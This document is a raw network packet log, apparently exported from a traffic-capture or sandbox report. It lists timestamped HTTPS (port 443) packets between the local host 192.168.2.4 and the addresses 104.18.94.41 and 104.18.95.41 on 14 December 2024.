                                                            Dec 14, 2024 10:10:46.290875912 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:46.290925980 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.291090965 CET49773443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:46.291101933 CET44349773104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.481693029 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.482069969 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.482131958 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.482824087 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.483258963 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.483402967 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.483429909 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.483501911 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.486077070 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.486437082 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.486471891 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.487179995 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.487689018 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.487807989 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.487823009 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.487855911 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.537589073 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.537590981 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.929137945 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.932255983 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.932348967 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:47.932411909 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:47.974625111 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.049694061 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.051955938 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.052016020 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.052047014 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.056637049 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.056685925 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.056694031 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.056718111 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.056802034 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.056840897 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.057816029 CET49775443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.057830095 CET44349775104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.061350107 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.061405897 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.061419964 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.061919928 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:48.062011003 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.062083960 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:48.062439919 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:48.062477112 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.066189051 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.066258907 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.066272020 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.114589930 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.114609003 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.124042988 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.124099016 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.124113083 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.165338993 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.165378094 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.170671940 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.170738935 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.170758963 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.174913883 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.174972057 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.174987078 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.183281898 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.183341026 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.183353901 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.191636086 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.191690922 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.191704035 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.207340956 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.207401991 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.207413912 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.215333939 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.215394974 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.215409994 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.223229885 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.223284960 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.223298073 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.231239080 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.231300116 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.231329918 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.240468025 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.240519047 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.240533113 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.286766052 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.286782980 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.313550949 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.313616037 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.313631058 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.323740005 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.323800087 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.323827982 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.327857971 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.327913046 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.327939987 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.350684881 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.350727081 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.350759029 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.350766897 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.350792885 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.357867002 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.357922077 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.357929945 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.357968092 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.362595081 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.373672009 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.373730898 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.373745918 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.373799086 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.380177021 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.380196095 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.380230904 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.390712023 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.390786886 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.390800953 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.390846014 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.400166035 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.400182962 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.400224924 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.410804987 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.410866976 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.410880089 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.410927057 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.417274952 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.417341948 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.426744938 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.426806927 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.433098078 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.433160067 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.505153894 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.505217075 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.513561010 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.513626099 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.520081043 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.520143032 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.528657913 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.528717995 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.535099030 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.535166025 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.537270069 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.537328959 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.537343979 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.537395954 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.537452936 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.537499905 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.537631989 CET49776443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.537663937 CET44349776104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.541049957 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:48.541143894 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.541219950 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:48.541470051 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:48.541491032 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.704684019 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.704767942 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:48.704849958 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.705339909 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:48.705420017 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.275192976 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.275542021 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.275604963 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.276094913 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.280461073 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.280596018 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.280606985 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.323343039 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.335417032 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.715857029 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.715951920 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.716304064 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.717139959 CET49777443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.717180967 CET44349777104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.758599043 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.759203911 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.759264946 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.760685921 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.761387110 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.761387110 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.761678934 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.806216002 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:49.921914101 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.922400951 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:49.922461987 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.923171997 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.923587084 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:49.923722982 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:49.923901081 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:49.923901081 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:49.923952103 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.198774099 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.201183081 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.201229095 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.201519012 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.201582909 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.201819897 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.205003977 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.207864046 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.208072901 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.208133936 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.215384960 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.215471029 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.215487003 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.223768950 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.223860979 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.223875046 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.274049044 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.319087982 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.369956017 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.389921904 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.394810915 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.394912958 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.394973993 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.405556917 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.405745029 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.405761957 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.414046049 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.414132118 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.414144993 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.423355103 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.423437119 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.423449039 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.425537109 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.427839041 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.427930117 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.427992105 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.431303024 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.431384087 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.431402922 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.435179949 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.435337067 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.435401917 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.442738056 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.442806005 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.442817926 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.443150997 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.443304062 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.443363905 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.446517944 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.446589947 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.446603060 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.450054884 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.450345993 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.450407028 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.453303099 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.453371048 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.453382969 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.463475943 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.463754892 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.463814974 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.470352888 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.470551014 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.470612049 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.477582932 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.477828026 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.477888107 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.495322943 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.525835991 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.525896072 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.545779943 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.569749117 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.582489014 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.584635973 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.584860086 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.584920883 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.590595007 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.590681076 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.590697050 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.595726013 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.595873117 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.595885992 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.600929976 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.600990057 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.605453968 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.605467081 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.605550051 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.605565071 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.615125895 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.615220070 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.615232944 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.615298033 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.620266914 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.622114897 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.622231007 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.622292042 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.628217936 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.628355980 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.628369093 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.628473043 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.629977942 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.630075932 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.630100012 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.630165100 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.630253077 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.636977911 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.636996984 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.637065887 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.640336990 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.647264957 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.647281885 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.647367954 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.651145935 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.651335001 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.651395082 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.657661915 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.657768011 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.657783985 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.661400080 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.661417961 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.661470890 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.664572001 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.664650917 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.664664030 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.664762974 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.667929888 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.668092966 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.668153048 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.674753904 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.674855947 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.685174942 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.685275078 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.689296961 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.689404011 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.689456940 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.689521074 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.689584017 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.692286015 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.692367077 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.695589066 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.703023911 CET44349778104.18.95.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.703098059 CET49778443192.168.2.4104.18.95.41
                                                            Dec 14, 2024 10:10:50.707088947 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.707241058 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.707314014 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.707376003 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.707454920 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.710875034 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.714891911 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.715054035 CET49779443192.168.2.4104.18.94.41
                                                            Dec 14, 2024 10:10:50.715112925 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.718399048 CET44349779104.18.94.41192.168.2.4
                                                            Dec 14, 2024 10:10:50.718554974 CET49779443192.168.2.4104.18.94.41
